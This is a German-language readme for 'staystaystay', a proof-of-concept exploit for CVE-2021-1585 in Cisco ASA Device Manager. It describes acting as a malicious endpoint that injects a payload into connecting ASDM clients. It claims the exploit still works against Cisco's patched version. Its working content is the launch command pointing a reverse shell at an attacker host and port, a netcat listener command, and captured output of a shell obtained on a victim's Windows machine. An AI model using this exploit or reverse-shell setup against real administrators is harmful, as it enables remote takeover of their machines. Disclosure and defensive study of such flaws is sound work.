
Proof of Concept für CVE-2021-1585: Cisco ASA Device Manager RCE
staystaystay ist ein Proof-of-Concept-Exploit für CVE-2021-1585, ein Man-in-the-Middle- oder bösartiges Endpunkt-RCE-Problem, das den Cisco ASA Device Manager (ASDM) betrifft. Das Problem wurde ursprünglich von Malcolm Lashley entdeckt und im Sommer 2021 veröffentlicht. Allerdings war es zu dem Zeitpunkt, als ich mich damit befasste, in der neuesten Version (ASDM 7.17(1)) noch nicht gepatcht – ich bin unabhängig darauf gestoßen.
Cisco hat dies in ASDM 7.18(1.152) „gefixt“. Ich sage „gefixt“, weil dieser Exploit immer noch einwandfrei funktioniert. Der Benutzer muss lediglich auf „Ja“ klicken. Siehe ein Video unten.
Angreifer können zwei Arten von Payloads konfigurieren, um eine Reverse Shell zum Opfer zu erhalten:
Wenn ein Opfer sein ASDM mit staystaystay verbindet, injiziert dieses den konfigurierten Payload, was zu einer Reverse Shell führt. Die jjs-Reverse-Shell kann mit einem typischen nc-Listener (oder sogar Metasploit, wenn gewünscht) abgefangen werden. Die Longtime-Sunshine-Option erfordert, dass der Angreifer dieses Framework verwendet.
Als Beispiel startet der folgende Befehl staystaystay auf Port 8443 mit dem jjs-Payload:
./staystaystay -j --lhost 10.0.0.2 --lport 1270 --https_port 8443
Sobald das Opfer eine Verbindung zu 8443 herstellt, wird eine Reverse Shell zu 10.0.0.2:1270 erzeugt:
albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.26 50283
Microsoft Windows [Version 10.0.19042.1645]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Cisco Systems\ASDM>whoami
whoami
desktop-1hug9pt\albinolobster
C:\Program Files (x86)\Cisco Systems\ASDM>
Das folgende Video enthält ein Beispiel für die Ausnutzung mit Longtime Sunshine:
Das folgende Video zeigt den Angriff gegen eine gepatchte Version:
Eine Analyse auf AttackerKB finden Sie hier: